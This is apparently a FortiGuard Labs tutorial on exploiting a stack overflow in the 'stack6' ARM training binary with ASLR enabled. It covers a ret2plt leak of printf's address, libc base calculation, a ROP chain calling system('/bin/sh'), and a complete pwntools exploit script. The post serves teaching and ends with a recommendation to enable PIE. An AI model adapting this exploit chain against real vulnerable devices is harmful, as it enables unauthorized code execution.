Threat Research

Tutorial of ARM Stack Overflow Exploit – Defeating ASLR with ret2plt

By Kai Lu | July 17, 2020

FortiGuard Labs Threat Research Report

The ARM architecture (a family of RISC instruction set architectures for computer processors) is widely used in IoT devices and smartphones. Understanding ARM exploits is crucial for developing protections against attacks targeting ARM-powered devices. In this blog, I present a tutorial on exploiting an ARM stack overflow. The target is stack6, a binary with a classic stack overflow vulnerability. ASLR (address space layout randomization), a security technique that hinders the exploitation of memory corruption vulnerabilities by randomizing where code and data are mapped, is enabled by default on the target machine. This means that to complete a full exploit, an attacker first needs to defeat ASLR before achieving code execution.

Exploit and Debug Environment

Raspberry PI 4B model 4GB: Raspberry Pi OS, armv7l GNU/Linux
Debugger: GDB 9.2 with GEF
Exploit Development Tool: pwntools

Quick Look

Let’s start by running the binary “stack6”. Feeding stack6 a very long input string causes a segmentation fault.

Figure 1. Running the binary stack6

The first thing we want to do is determine whether ASLR is enabled on the target device. On the Raspberry Pi 4B, we can check its status by executing the command “sysctl kernel.randomize_va_space”. A value of 2 means ASLR is fully enabled.

Figure 2. Check the status of ASLR
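The same check can be scripted. The following is a minimal sketch, assuming a Linux target that exposes the setting under /proc; the helper names describe_aslr and read_aslr_setting are illustrative and not part of the original exploit.

```python
from pathlib import Path

# Meanings of kernel.randomize_va_space on Linux.
ASLR_MODES = {
    0: "disabled",
    1: "partial: stack, mmap base and vDSO are randomized",
    2: "full: same as 1, plus the heap is randomized",
}


def describe_aslr(value):
    """Translate the numeric sysctl value into a short description."""
    return ASLR_MODES.get(value, "unknown value")


def read_aslr_setting(path="/proc/sys/kernel/randomize_va_space"):
    """Return the current setting as an int, or None if it cannot be read."""
    try:
        return int(Path(path).read_text().strip())
    except (OSError, ValueError):
        return None


setting = read_aslr_setting()
if setting is None:
    print("[*] Could not read the ASLR setting on this system")
else:
    print("[*] ASLR setting {}: {}".format(setting, describe_aslr(setting)))
```

On the target described above, this should report the value 2, matching the sysctl output.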

Next, we use the tool checksec to see which security mitigations the binary has. We can see that PIE (position-independent executable) is not enabled. This makes it possible to defeat ASLR with ret2plt (return to Procedure Linkage Table).

Figure 3. Check security feature in the binary stack6 with checksec
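To illustrate what the PIE check looks at, here is a rough sketch that reads the e_type field of an ELF header: ET_EXEC (2) indicates a fixed-address executable, while ET_DYN (3) indicates a shared object or PIE. This is a simplified heuristic and not checksec's actual implementation; the helper names and the synthetic header are assumptions made for the example.

```python
import struct

ET_EXEC = 2  # executable linked at a fixed address (no PIE)
ET_DYN = 3   # shared object, or a position-independent executable


def elf_type(header):
    """Return the e_type field from the first bytes of an ELF file."""
    if len(header) < 18 or header[:4] != b"\x7fELF":
        raise ValueError("not an ELF header")
    # e_ident[5] (EI_DATA): 1 = little-endian, 2 = big-endian
    endian = "<" if header[5] == 1 else ">"
    (e_type,) = struct.unpack_from(endian + "H", header, 16)
    return e_type


def looks_position_independent(header):
    """Heuristic only: ET_DYN covers both PIEs and shared libraries."""
    return elf_type(header) == ET_DYN


# Synthetic 32-bit little-endian header standing in for a non-PIE binary.
# For a real file: header = open("./stack6", "rb").read(18)
fake_header = b"\x7fELF" + bytes([1, 1, 1]) + bytes(9) + struct.pack("<H", ET_EXEC)
print("[*] PIE:", looks_position_independent(fake_header))
```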

The logic of the program is pretty straightforward. 

Figure 4. The logic of the binary stack6

Now let’s look at what happens when we run this binary in GDB (GNU Debugger). We set a breakpoint at the address 0x0001054c (pop {r4, r11, pc}) and then feed an 84-byte string to the program.

Figure 5. Debugging in GDB

Next, the data 0x58585858 on the stack is popped into the pc (program counter) register. From this point on, we control the pc register. Let’s now take a close look at how to defeat ASLR using ret2plt.

Figure 6. The controlled pc register
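The 84-byte probe can be reconstructed as follows. This is a sketch under the assumption, taken from the exploit script at the end of this post, that 80 bytes of padding precede the word that is popped into pc; the marker "XXXX" corresponds to the value 0x58585858 seen in the debugger.

```python
import struct

PADDING_LEN = 80   # bytes before the word popped into pc (from the exploit script)
MARKER = b"XXXX"   # ASCII 'X' is 0x58, so this word reads as 0x58585858

probe = b"A" * PADDING_LEN + MARKER

# Interpret the last four bytes as the little-endian word the CPU would load.
(pc_value,) = struct.unpack("<I", probe[PADDING_LEN:PADDING_LEN + 4])
print("[*] probe length: {} bytes, pc would be {}".format(len(probe), hex(pc_value)))
```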

Defeating ASLR with ret2plt

In the prior section, we saw that PIE is not enabled on the binary stack6. That means the stack6 image is mapped at a fixed address in the process address space, even when ASLR is on. This makes it possible to defeat ASLR with ret2plt.

The binary calls printf() directly, so I decided to leak the address of printf() in libc.so. Since we already control the pc register, we can use a ROP (return-oriented programming) chain to call printf@PLT with printf@GOT as its argument, which prints the bytes stored in the GOT entry, that is, the runtime address of printf(). The addresses of printf@PLT and printf@GOT are both fixed because stack6 is not a PIE. We then use the tool Ropper to find two gadgets in the binary stack6 that meet our requirements.

Figure 7. The two gadgets in the binary stack6

The addresses of printf@PLT and printf@GOT are shown as follows.

Figure 8. The addresses of printf@PLT and printf@GOT

The following code snippet leaks the address of printf(). The payload first calls printf@PLT(printf@GOT). As shown in Figure 7, after that call execution continues until it reaches the first gadget again. We then call fflush@PLT(0) to flush the output stream, which makes sure the exploit program receives the leaked data. Once we have the leaked data, we can move on to code execution.

Figure 9. The code snippet of leaking printf() address
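The three calls in the leak payload all use the same eight-word stack frame, so the layout can be sketched with a small helper. This version uses only the standard struct module instead of pwntools; the addresses are copied from the exploit script at the end of this post, and call_frame is an illustrative name, not something the original script defines.

```python
import struct

GADGET1 = 0x000105dc     # pop {r3, r4, r5, r6, r7, r8, sb, pc}
GADGET2 = 0x000105c4     # mov r0, r7; mov r1, r8; mov r2, sb; blx r3
PRINTF_PLT = 0x0001035c
PRINTF_GOT = 0x00020734
FFLUSH_PLT = 0x00010374
ENTRY = 0x103b0


def call_frame(func, arg0=0, arg1=0, arg2=0):
    """Eight little-endian words consumed by gadget1: r3, r4, r5, r6, r7, r8, sb, pc."""
    return struct.pack("<8I", func, 0, 0, 0, arg0, arg1, arg2, GADGET2)


stage1 = b"A" * 80 + struct.pack("<I", GADGET1)  # padding, then the controlled pc
stage1 += call_frame(PRINTF_PLT, PRINTF_GOT)     # printf@plt(printf@got)
stage1 += call_frame(FFLUSH_PLT, 0)              # fflush@plt(0)
stage1 += call_frame(ENTRY)                      # jump back to the entry point

print("[*] stage 1 payload: {} bytes".format(len(stage1)))
```

Each frame ends with the address of the second gadget, so popping the frame immediately triggers the call with r0 taken from r7.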

The following is the leaked data, which includes the address of printf() in libc.so. Subtracting the offset of printf() within libc.so from this address gives the base address of libc.so.

Figure 10. The leaked data
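The base address calculation can be sketched as below. The offset 96 and the printf() offset 0x48430 are taken from the exploit script at the end of this post and are specific to this target and its libc build; the leaked address 0xb6e2b430 is a made-up value for illustration, since the real one changes on every run. Note also that printf() stops at a NUL byte, so a leak containing one would come back truncated.

```python
import struct

PRINTF_OFFSET_IN_LIBC = 0x48430  # from the exploit script; depends on the libc build
LEAK_OFFSET = 96                 # position of the leaked word in the received data


def libc_base_from_output(data):
    """Extract the leaked printf() address and derive the libc base address."""
    if len(data) < LEAK_OFFSET + 4:
        raise ValueError("output too short to contain the leak")
    (printf_addr,) = struct.unpack_from("<I", data, LEAK_OFFSET)
    base = printf_addr - PRINTF_OFFSET_IN_LIBC
    # A library is mapped on a page boundary, so a misaligned result
    # suggests a wrong offset or a truncated leak.
    if base & 0xFFF:
        raise ValueError("derived base is not page-aligned")
    return base


# Hypothetical received data: 96 filler bytes followed by a made-up address.
fake_output = b"?" * LEAK_OFFSET + struct.pack("<I", 0xB6E2B430)
libc_base = libc_base_from_output(fake_output)
print("[*] libc.so base address:", hex(libc_base))
```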

Code Execution Stage

In the previous section, we obtained the base address of libc.so. In this section, we perform the code execution needed to get a shell. With the base address known, we can compute the address of system() in the process space and locate the string “/bin/sh” in libc.so.

The payload of this stage is set up as follows:

Figure 11. The code snippet of performing code execution

As shown in Figure 9, the end of the leak payload forces program execution to jump back to the entry point, so the program runs again. Because this happens within the same process, the libc.so base address we leaked remains valid. At this point we feed it the code execution payload. When execution reaches the instruction “pop {r4, r11, pc}” at the address 0x0001054c, the program jumps to the first gadget. We have crafted the data on the stack so that the r3 register holds the address of system() and the r7 register points to the string “/bin/sh”.

Next, it jumps to the second gadget, which moves the value of r7 to r0, so r0 now points to the string “/bin/sh”. When it executes the instruction “blx r3”, it calls system(“/bin/sh”) to spawn a shell.

Figure 12. Getting the shell
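To make the register flow concrete, the two gadgets can be modeled in a few lines of Python. This is a toy model for illustration, not an emulator: it only tracks the registers named in the gadgets, and the system() and "/bin/sh" addresses are hypothetical values derived from a made-up libc base of 0xb6de3000.

```python
import struct

GADGET2 = 0x000105c4
SYSTEM_ADDR = 0xB6E1B9C8  # hypothetical: made-up base 0xb6de3000 + 0x389c8
BINSH_ADDR = 0xB6F0EB6C   # hypothetical: made-up base 0xb6de3000 + 0x12bb6c


def run_gadgets(frame):
    """Model gadget1 then gadget2; return (call target, r0, r1, r2) at blx r3."""
    names = ("r3", "r4", "r5", "r6", "r7", "r8", "sb", "pc")
    # gadget1: pop {r3, r4, r5, r6, r7, r8, sb, pc}
    regs = dict(zip(names, struct.unpack("<8I", frame[:32])))
    if regs["pc"] != GADGET2:
        raise ValueError("frame does not return into gadget2")
    # gadget2: mov r0, r7; mov r1, r8; mov r2, sb; blx r3
    regs["r0"], regs["r1"], regs["r2"] = regs["r7"], regs["r8"], regs["sb"]
    return regs["r3"], regs["r0"], regs["r1"], regs["r2"]


frame = struct.pack("<8I", SYSTEM_ADDR, 0, 0, 0, BINSH_ADDR, 0, 0, GADGET2)
target, r0, r1, r2 = run_gadgets(frame)
print("[*] blx r3 -> {} with r0 = {}".format(hex(target), hex(r0)))
```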

We run the exploit script twice, and can clearly see that the base address of libc.so varies when ASLR is on. At this point, we have completed the full exploit. 

Conclusion

In this tutorial, we showed how to exploit a classic buffer overflow vulnerability when ASLR is enabled. Because the PIE mitigation is not enabled in the target binary, it is possible to defeat ASLR using ret2plt and complete the full exploit.

Solution

If PIE is enabled in the target binary, the above exploit will fail, because the addresses of the PLT, the GOT, and the gadgets are no longer fixed. We recommend that app developers enable PIE and other security mitigation features when developing apps for the ARM architecture. This way, even if a buffer overflow vulnerability exists in the app, it’s still difficult for attackers to develop a working exploit.

Exploit Script Code

from pwn import *

printf_plt = 0x0001035c
printf_got = 0x00020734
fflush_plt = 0x00010374
printf_offset_in_libc = 0x48430
system_offset_in_libc = 0x389c8
# 0x0012bb6c   db         "/bin/sh", 0
binsh_offset_in_libc = 0x0012bb6c
entry = 0x103b0

# start process
sh = process("./stack6")

payload = b''
payload += b'A'*80

# 0x0001054c: pop {r4, r11, pc}   //controlled pc
# 0x000105dc: pop {r3, r4, r5, r6, r7, r8, sb, pc}; //gadget1
# 0x000105c4: mov r0, r7; mov r1, r8; mov r2, sb; blx r3; //gadget2
gadget1 = 0x000105dc
gadget2 = 0x000105c4

payload += p32(gadget1)

payload += p32(printf_plt)  # r3, it stores the address of printf@plt
payload += p32(0)  # r4
payload += p32(0)  # r5
payload += p32(0)  # r6
payload += p32(printf_got)  # r7, it stores the address of printf@got, it will be passed to printf@plt as a parameter
payload += p32(0)  # r8
payload += p32(0)  # sb
payload += p32(gadget2)  # pc, it calls printf@plt(printf@got), leaking the address of printf in libc.so

payload += p32(fflush_plt)  # r3, it stores the address of fflush@plt
payload += p32(0)  # r4
payload += p32(0)  # r5
payload += p32(0)  # r6
payload += p32(0)  # r7, the parameter is 0.
payload += p32(0)  # r8
payload += p32(0)  # sb
payload += p32(gadget2)  # pc, it calls fflush@plt(0)

payload += p32(entry)  # r3, it stores the address of the entry point
payload += p32(0)  # r4
payload += p32(0)  # r5
payload += p32(0)  # r6
payload += p32(0)  # r7
payload += p32(0)  # r8
payload += p32(0)  # sb
payload += p32(gadget2)  # pc, it jumps to the entry point again, so the program restarts and waits for the code execution payload

print("[*] The 1st stage payload: " + payload.hex())
sh.sendline(payload)

recvdata = sh.recv()
print("[*] recv data: {}".format(recvdata.hex()))
# the leaked printf address sits at offset 96 of the received data
printf_addr = u32(recvdata[96:100])
print("[*] Got printf address: " + hex(printf_addr))
print("[*] libc.so base address: " + hex(printf_addr - printf_offset_in_libc))

libc_base = printf_addr - printf_offset_in_libc
system_addr = libc_base + system_offset_in_libc
binsh_addr = libc_base + binsh_offset_in_libc
print("[*] system address: " + hex(system_addr))
print("[*] binsh address: " + hex(binsh_addr))

payload = b''
payload += b'A'*80
payload += p32(gadget1)

payload += p32(system_addr)  # r3 points to system()
payload += p32(0)  # r4
payload += p32(0)  # r5
payload += p32(0)  # r6
payload += p32(binsh_addr)  # r7 points to "/bin/sh"
payload += p32(0)  # r8
payload += p32(0)  # sb
payload += p32(gadget2)  # pc, it will call system("/bin/sh")

print("[*] The 2nd stage payload: " + payload.hex())
sh.sendline(payload)
sh.interactive()
sh.close()

Reference

https://azeria-labs.com/part-3-stack-overflow-challenges/
https://github.com/azeria-labs/ARM-challenges
https://github.com/Gallopsled/pwntools
https://github.com/hugsy/gef
